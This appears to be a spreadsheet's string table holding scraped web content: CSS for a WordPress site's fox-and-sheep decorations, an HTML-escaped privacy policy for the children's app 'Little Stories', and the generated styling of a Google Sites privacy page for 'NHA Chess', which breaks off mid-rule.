.stoerer-content-container {
  padding: 20px;
	margin-top: 30px;
}
.stoerer</t>
  </si>
  <si>
    <t>h1 {
  font-size: small;
	font-family: Open Sans;
	line-height: 1em;
	margin-bottom: 0.9em;	
}
/* Footer decoration*/
.decoration-fox {
  position: absolute;
  top: -465px;
  left: -190px;
  width: 430px;
  height: 560px;
	background-image: url('/wp-content/uploads/2017/12/FoxSheep_Fox.png');
	background-size: cover;
	background-repeat: no-repeat;
	margin: 0;
	padding: 0;
	   -moz-transform: scaleX(-1);
    -o-transform: scaleX(-1);
    -webkit-transform: scaleX(-1);
    transform: scaleX(-1);
    filter: FlipH;
    -ms-filter: "FlipH";
}
.decoration-sheep, .decoration-sheep-center {
  position: absolute;
  right: 0px;
  width: 300px;
  height: 280px;
	background-image: url('/wp-content/uploads/2017/12/FoxSheep_Sheep.png');
	background-size: cover;
	background-repeat: no-repeat;
	margin: 0;
	padding: 0;
}
.decoration-sheep {
	top: 109px;
}
.decoration-sheep-center {
	right: 150px;
	bottom: 0px;
}</t>
  </si>
  <si>
    <t>&lt;html&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta http-equiv=Content-Type content="text/html; charset=utf-8"&gt;_x005F_x000D_
&lt;meta name=Generator content="Microsoft Word 15 (filtered)"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="style.css"&gt;_x005F_x000D_
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0,  maximum-scale=1"&gt;_x005F_x000D_
&lt;meta name="format-detection" content="telephone=no"&gt;_x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body lang=EN-US style='word-wrap:break-word'&gt;_x005F_x000D_
_x005F_x000D_
&lt;div class=WordSection1&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal align=center style='text-align:center'&gt;&lt;b&gt;&lt;span lang=ru_x005F_x000D_
style='font-size:12.0pt;line-height:115%'&gt;Little Stories Privacy Policy&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;This_x005F_x000D_
Privacy Policy is created by &lt;/span&gt;&lt;/b&gt;&lt;span lang=ru style='font-size:12.0pt;_x005F_x000D_
line-height:115%'&gt;Diveo Media OU  and distributed with ‘Little Stories’ app.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;*Last_x005F_x000D_
update: March 24, 2023.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;GENERAL&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;The_x005F_x000D_
application &amp;quot;Little Stories&amp;quot; is a growing collection of author's_x005F_x000D_
tales. Fairy tales are designed for children between the ages of three and_x005F_x000D_
seven. To begin reading a fairy tale, the parent must specify the name and_x005F_x000D_
gender of his/her child in the Settings menu.</t>
  </si>
  <si>
    <t>Fairy tales are developing such_x005F_x000D_
qualities as respect, care, love, self-confidence, courage.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;COLLECTION_x005F_x000D_
OF INFORMATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;All_x005F_x000D_
received information is used exclusively to improve the quality of the_x005F_x000D_
application ‘Little Stories’ and can not be transferred to third parties.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;We_x005F_x000D_
do not collect any personal information.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;PERMISSIONS&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;We_x005F_x000D_
ask you to allow us use the microphone on your device ONLY for recording the_x005F_x000D_
voice during voiceovering the story.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;ADVERTISING&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;The_x005F_x000D_
&amp;quot;Little stories&amp;quot; app is completely free of ads.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;CHANGES&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;Diveo_x005F_x000D_
Media OU may update this information from time to time. We recommend you_x005F_x000D_
periodically check this document to be aware of the changes.&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;CONTACT&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;For_x005F_x000D_
any questions related to the Privacy Policy, you can always contact us via_x005F_x000D_
email:&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;abc@diveomedia.com&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;b&gt;&lt;span lang=ru style='font-size:12.0pt;line-height:115%'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal&gt;&lt;span lang=ru&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&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3-4ZDwLT-5D5_h27mW3WLZlmZbW3ZyF1VEL0uAanJD5DRebgRcmOULAbKeEe6_vYQJV2aj","je":1,"sstu":1681340259492864,"si":"CMnHp8e4pf4CFXcAbwYdopEC2w","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747263,5748029,5752694,5753329,5754229,5754594,5758824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49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347762,50455861,50468091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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="NHA Chess"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/view/nhagames/privacy-policy/nha-chess"&gt;&lt;meta property="og:description" content="
Privacy
This privacy policy covers the use of the &amp;#39;NHA Chess&amp;#39;.
 It may not be applicable to other software produced or released by Nha Games. 
 Nha Games does not collect any statistics, personal information, or analytics from our users, other than built in mechanisms that are present for all the"&gt;&lt;meta itemprop="name" content="NHA Chess"&gt;&lt;meta itemprop="description" content="
Privacy
This privacy policy covers the use of the &amp;#39;NHA Chess&amp;#39;.
</t>
  </si>
  <si>
    <t>It may not be applicable to other software produced or released by Nha Games. 
 Nha Games does not collect any statistics, personal information, or analytics from our users, other than built in mechanisms that are present for all the"&gt;&lt;meta itemprop="url" content="https://sites.google.com/view/nhagames/privacy-policy/nha-chess"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="T-846HQNLd8epN443xvA3A"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="T-846HQNLd8epN443xvA3A"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="T-846HQNLd8epN443xvA3A"&gt;&lt;script nonce="Ogkio8K-3XPfUD5L-ltJFg"&gt;&lt;/script&gt;&lt;title&gt;NHA Chess&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="T-846HQNLd8epN443xvA3A"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(34,110,147,1);}.JYVBee .OUGEr{color: rgba(34,110,147,1);}.OmQG5e .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.iwQgFb{background-color: rgba(0,0,0,0.150000006);}.ySLm4c{font-family: Lato, sans-serif;}.CbiMKe{background-color: rgba(30,108,147,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color: rgba(34,110,147,1);}.qeLZfd .qLrapd{color: rgba(34,110,147,1);}.qeLZfd .JYVBee{color: rgba(34,110,147,1);}.qeLZfd .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.qeLZfd .OmQG5e{color: rgba(33,33,33,1);}.qeLZfd .NHD4Gf{color: rgba(33,33,33,1);}.qeLZfd .aw5Odc{color:</t>
  </si>
  <si>
    <t>rgba(0,101,128,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,101,128,1);}.qeLZfd .iwQgFb{background-color: rgba(0,0,0,0.150000006);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb .OUGEr{color: rgba(34,110,147,1);}.qeLZfd .JYVBee</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(34,110,147,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(33,33,33,1);}.qeLZfd:before{background-color: rgba(242,242,242,1); display: block;}.lQAHbd .zfr3Q{color: rgba(255,255,255,1);}.lQAHbd .qnVSj{color: rgba(255,255,255,1);}.lQAHbd .Glwbz{color: rgba(255,255,255,1);}.lQAHbd .duRjpb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .qLrapd{color: rgba(255,255,255,1);}.lQAHbd .JYVBee{color: rgba(255,255,255,1);}.lQAHbd .aHM7ed{color: rgba(255,255,255,1);}.lQAHbd .OmQG5e{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .NHD4Gf{color: rgba(255,255,255,1);}.lQAHbd .aw5Odc{color: rgba(255,255,255,1);}.lQAHbd .dhtgD:hover{color: rgba(255,255,255,1);}.lQAHbd .dhtgD:visited{color: rgba(255,255,255,1);}.lQAHbd .iwQgFb{background-color: rgba(255,255,255,0.150000006);}.lQAHbd .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .JYVBee .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .OmQG5e .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(30,108,147,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color: rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color: rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}.O13XJf .IFuOkc{background-color: rgba(34,110,147,1); background-image: url(https://ssl.gstatic.com/atari/images/simple-header-blended-small.png);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.4; display: block;}.O13XJf .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .qnVSj{color: rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .duRjpb{color: rgba(255,255,255,1);}.O13XJf .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .JYVBee{color: rgba(255,255,255,1);}.O13XJf .aHM7ed{color: rgba(255,255,255,1);}.O13XJf .OmQG5e{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .NHD4Gf{color: rgba(255,255,255,1);}.tpmmCb .zfr3Q{color: rgba(33,33,33,1);}.tpmmCb .zfr3Q .OUGEr{color :</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.aw5Odc{color: rgba(0,101,128,1);}.dhtgD:hover{color: rgba(0,122,147,1);}.dhtgD:active{color: rgba(0,122,147,1);}.dhtgD:visited{color: rgba(0,101,128,1);}.Zjiec{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 300; letter-spacing: 1px; line-height: 1.3; padding-bottom: 62.5px; padding-left: 48px; padding-right: 36px; padding-top: 11.5px;}.XMyrgf{margin-top: 0px; margin-left: 48px; margin-bottom: 24px; margin-right: 24px;}.TlfmSc{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.Mz8gvb{color: rgba(255,255,255,1);}.zDUgLc{background-color: rgba(33,33,33,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(178,178,178,1);}.YTv4We:hover:before{background-color: rgba(255,255,255,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.eWDljc{background-color: rgba(33,33,33,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(255,255,255,1); opacity: 0.26;}.PsKE7e{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 12pt; font-weight: 300;}.lhZOrc{color: rgba(73,170,212,1);}.hDrhEe:hover{color: rgba(73,170,212,1);}.M9vuGd{color: rgba(73,170,212,1); font-weight: 400;}.jgXgSe:hover{color: rgba(73,170,212,1);}.j10yRb:hover{color: rgba(0,188,212,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.tCHXDc{color: rgba(255,255,255,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.wgxiMe{background-color: rgba(33,33,33,1);}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .iWs3gf.chg4Jd:focus{background-color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.1199999973);}.fOU46b .G8QRnc .Mz8gvb{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.ZXW7w{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .TlfmSc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .qV4dIc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc .jgXgSe: hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc .M9vuGd{color: rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .usN8rf .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .usN8rf .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .TlfmSc{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .qV4dIc{color: rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf .jgXgSe:hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf .tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .aCIEDd .qV4dIc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .TlfmSc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.fOU46b .aCIEDd .KJll8d{background-color: rgba(33,33,33,1);}.fOU46b .aCIEDd .ZXW7w{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .jgXgSe</t>
  </si>
  <si>
    <t>: hover{color: rgba(33,33,33,1); opacity: 0.82;}.fOU46b .aCIEDd .Mz8gvb{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.fOU46b .aCIEDd .iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}.fOU46b</t>
  </si>
  <si>
    <t>.a3ETed .qV4dIc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .a3ETed .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .a3ETed .jgXgSe:hover{color: rgba(255,255,255,1); opacity: 0.82;}.fOU46b .a3ETed</t>
  </si>
  <si>
    <t>.Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd: focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .zDUgLc{opacity: 0;}.LBrwzc .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color: rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(33,33,33,1); color: rgba(0,188,212,0.6999999881);}.BFDQOb:hover{color: rgba(73,170,212,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(242,242,242,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(30,108,147,1); color: rgba(255,255,255,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 11pt; font-weight: 400; line-height: 1.6667; margin-top: 12px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 34pt; font-weight: 300; letter-spacing: 0.5px; line-height: 1.2; margin-top: 30px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(34,110,147,1);}.JYVBee{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 400; line-height: 1.4; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(34,110,147,1);}.OmQG5e{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 15pt; font-style: normal; font-weight: 400; line-height: 1.25; margin-top: 16px;}.GV3q8e{margin-bottom: -16px;}.NHD4Gf{color: rgba(33,33,33,1);}.LB7kq .duRjpb{font-size: 64pt; letter-spacing: 2px; line-height: 1; margin-top: 40px;}.LB7kq .JYVBee{font-size: 25pt; font-weight: 300; line-height: 1.1; margin-top: 25px;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 40pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 53pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 19pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 22pt;}}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 40px; padding-top: 40px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 30px; padding-top: 30px;}}.SBrW1{height: 520px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 520px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 180px; padding-bottom: 32px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe .duRjpb{color: rgba(34,110,147,1); font-size: 45pt; line-height: 1.1;}.gk8rDe .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.gk8rDe .JYVBee{color: rgba(34,110,147,1); font-size: 27pt; line-height: 1.35; margin-top: 15px;}.gk8rDe .aHM7ed{color: rgba(34,110,147,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe .JYVBee{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(33,33,33,1); font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 48.5px;}}.TlfmSc{font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.PsKE7e{font-family: Lato, sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.21;}.hDrhEe{padding-bottom: 11.5px; padding-top: 11.5px;}.zDUgLc{opacity: 1;}.QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1) ; color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal; line-height: normal;}.KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom:</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom : hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec</t>
  </si>
  <si>
